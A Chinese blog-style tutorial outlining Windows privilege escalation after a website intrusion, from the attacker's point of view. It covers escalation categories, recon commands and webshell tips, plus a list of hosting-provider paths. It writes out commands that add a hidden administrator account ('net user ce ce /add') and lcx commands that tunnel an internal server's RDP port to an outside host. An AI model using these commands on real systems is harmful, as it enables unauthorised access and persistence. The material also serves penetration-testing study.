当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
初识提权
0x01 什么是提权?
很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限。
提权是将服务器的普通用户提升为管理员用户的一种操作,提权常常用于辅助旁注攻击。
下面我们来了解下window的权限(来自百度百科):
Windows 提供了非常细致的权限控制项,能够精确定制用户对资源的访问控制能力,大多数的权限从其名称上就可以基本了解其所能实现的内容。
" 权限"(Permission)是针对资源而言的。也就是说,设置权限只能是以资源为对象,即"设置某个文件夹有哪些用户可以拥有相应的权限",而不能是以用户为主,即"设置某个用户可以对哪些资源拥有权限"。这就意味着"权限"必须针对"资源"而言,脱离了资源去谈权限毫无意义──在提到权限的具体实施时,"某个资源"是必须存在的。
利用权限可以控制资源被访问的方式,如User组的成员对某个资源拥有"读取"操作权限、Administrators组成员拥有"读取+写入+删除"操作权限等。
值得一提的是,有一些Windows用户往往会将"权利"与"权限"两个非常相似的概念搞混淆,这里做一下简单解释:
“权利"(Right)主要是针对用户而言的。
"权力"通常包含"登录权力" (Logon Right)和"特权"(Privilege)两种。
登录权力决定了用户如何登录到计算机,如是否采用本地交互式登录、是否为网络登录等。特权则是一系列权力的总称,这些权力主要用于帮助用户对系统进行管理,如是否允许用户安装或加载驱动程序等。显然,权力与权限有本质上的区别。
简单的来说,每个软件,都有默认的权限,当我们入侵的时候,得到的就是这个软件的默认权限.
例如:
在IIS中通过CMD执行"whoami" 查看当前用户权限,当前的用户是"nt authority\network service" 网络用户
如果直接在Windwos下执行CMD命令"whoami"得到的结果是"fendo\administrator" admin权限。
以下是几个常见的问题:
(1)、第一个 直接在测试环境中运行木马,权限很大(屏幕监控,键盘记录等)
用户administrator去执行的木马,享有administrator的权限
(2)、第二个用webshell调用执行木马(iis)
第一个问题 是否上线 上线 第二个问题 是否可以监控屏幕 无权限 iis搭建环境下,默认webshell权限不是administrator,而是iis用户权限
(3)、第三个继续用webshell调用执行木马(软件)
第一个问题 是否上线 上线 第二个问题 是否可以监控屏幕 有权限 软件享有administrator的权限
提权技术分类大概分为三种:
• 1.系统溢出漏洞提权
• 2.数据库提权
• 3.第三方软件提权
0x02 通常脚本所处的权限
asp / php 匿名权限(网络服务权限)
aspx user权限
jsp 通常是系统权限
0x03 Windwos常见提权
(一)、本地提权
(A)、溢出提权
1. 远程溢出
远程溢出提权是指攻击者只需要与服务器建立连接,然后根据系统的漏洞,使用响应的溢出程序,即可获取到远程服务器的root权限。
攻击者在攻击服务器时,使用远程溢出这种溢出攻击这种攻击手段是比较少的,服务器通常都打了漏洞补丁,这样旧的溢出漏洞一般不会再起作用,而新的溢出漏洞少之又少,可以说远程溢出漏洞已经"日落西山"了。
2. 本地溢出
本地溢出提权首先要有服务器的一个用户,且需要有执行的权限的用户才能发起提权,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出root权限。
EXP = Exploit的中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的方法。
(B)、Getpass 提权
(C)、hash传递入侵
(D)、lpk提权
(二)、数据库提权
1. Mysql提权
分类:功能型,技巧型,漏洞型
功能型:udf提权
技巧型:启动项提权
漏洞型:mof提权
2. SQL Server提权
3. Oracle提权
• 虚拟主机提权
• 星外提权
• 西部数码提权
• 华众虚拟主机提权
(三)、第三方软件提权
(1)、FTP提权
• serv-u提权
• G6-FTP提权
• FileZilla提权
• FlashFXP提权
• PcAnywhere提权
• Xlight FTP Server提权
(2)、远程软件提权
• vnc
• radmin
(3)、其他
• Magic Winmail提权
• navicat提权
• zend
• 搜狗输入法提权
• PR提权详解
• 巴西烤肉提权
• 利用360提权
(四)、提权辅助
1)3389
2)端口转发
3)DLL劫持
0x04 收集信息
内外网
服务器系统和版本位数
服务器的补丁情况
服务器的安装软件情况
服务器的防护软件情况
端口情况
支持脚本情况
0x05 信息收集常用命令
Windwos 命令
命令 | 命令意思 |
ipconfig /all | 查看当前ip |
net user | 查看当前服务器账号情况 |
netstat -ano | 查看当前服务器端口开放情况 |
ver | 查看当前服务器操作系统 |
systeminfo | 查看当前服务器配置信息(补丁情况) |
tasklist /svc | 查看当前服务器进程情况 |
taskkill -PID pid号 | 结束某个pid号的进程 |
taskkill /im qq.exe /f | 结束QQ进程 |
net user ce ce /add | 添加一个用户名为ce,密码为ce的用户 |
net localgroup administrators ce /add | 将用户ce 添加到管理员组 |
whoami | 查看当前操作用户(当前权限) |
Windwos 常见详细命令文章链接:https://blog.csdn.net/God_XiangYu/article/details/99656410
Linux 命令
命令 | 命令意思 |
ls -al | 查看当前目录下的文件和文件夹 |
pwd | 查看当前操作路径 |
uname -a | 查看当前服务器内核信息 |
Linux 常见详细命令文章链接:https://blog.csdn.net/God_XiangYu/article/details/89703615
0x06 上传的大马,运行cmd 无法执行?
可能是存在如下三种原因:
1、防护软件拦截
2、cmd 被降权
3、组件被删除
解决方法:找可读写目录上传cmd.exe,将执行的cmd.exe 路径替换成上传的路径,再次调用执行
0x07 查看3389 端口
如果默认3389被更改,如果找到更改后的端口?
1、注册表读取
2、工具扫描
3、命令探针
0x08 端口转发
lcx
网站服务器是内网 IP 192.168.x.1
外网服务器IP是 192.168.x.2
在内网服务器执行的lcx 命令是:
lcx.exe -slave 192.168.x.2 51 192.168.x.1 3389
在外网服务器上执行的命令:
lcx.exe -listen 51 3389
端口转发文章链接:https://blog.csdn.net/God_XiangYu/article/details/98475688
0x09 常见虚拟主机常见路径
-
D:\virtualhost\web580651\www\ 新网虚拟主机
-
-
F:\usr\fw04408\xpinfo\ 万网虚拟主机
-
-
D:\hosting\wwwroot\ Prim
@Hosting虚拟主机
-
-
e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机
-
-
d:\freehost\zhoudeyang\web\ 星外虚拟主机主机
-
-
D:\vhostroot\LocalUser\gdrt\ 星外分支
-
-
f:\host\wz8088\web\ 星外分支
-
-
D:\vhostroot\localuser\ vhostroot
参考链接:https://blog.csdn.net/u011781521/article/details/60976501
我不需要自由,只想背着她的梦
一步步向前走,她给的永远不重